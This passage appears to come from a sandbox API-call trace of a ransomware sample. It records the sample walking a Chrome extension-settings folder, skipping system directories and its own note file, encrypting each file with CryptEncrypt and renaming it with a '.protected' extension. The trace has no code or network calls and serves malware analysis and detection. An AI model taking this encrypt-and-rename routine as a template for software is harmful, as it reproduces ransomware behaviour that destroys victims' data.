HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0084.347] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0084.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0084.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0084.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0084.348] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.348] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.348] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, 
lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.348] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.348] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.349] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.349] CloseHandle (hObject=0x15c) returned 1 [0084.349] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.protected") returned 157 [0084.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.protected")) returned 1 [0084.350] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") 
returned -1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0084.350] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.350] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0084.350] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0084.350] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.350] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.351] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0084.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.351] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0084.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.351] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0084.351] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.352] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.352] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.352] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.352] CloseHandle (hObject=0x15c) returned 1 [0084.352] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension 
Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.protected") returned 154 [0084.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.protected")) returned 1 [0084.353] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0084.353] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.353] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0084.353] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0084.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.354] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0084.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.354] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0084.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.354] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0084.354] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.354] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.354] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, 
lpOverlapped=0x0) returned 1 [0084.354] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.354] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.355] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.355] CloseHandle (hObject=0x15c) returned 1 [0084.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.protected") returned 151 [0084.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock.protected")) returned 1 [0084.356] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0084.356] lstrcmpiW 
(lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0084.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.356] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0084.356] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0084.356] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.356] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.357] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0084.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.357] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 
0x0 [0084.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.357] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0084.357] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0xc3, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffff3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.358] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0xc3, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.358] CloseHandle (hObject=0x15c) returned 1 [0084.358] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.protected") returned 150 [0084.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension 
Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.protected")) returned 1 [0084.359] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0084.359] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.359] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0084.359] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0084.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.360] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0084.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.360] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0084.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.360] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0084.360] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.361] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.361] SetFilePointerEx (in: 
hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.361] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.361] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.361] CloseHandle (hObject=0x15c) returned 1 [0084.361] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.protected") returned 162 [0084.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.protected")) returned 1 [0084.361] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.362] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.362] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
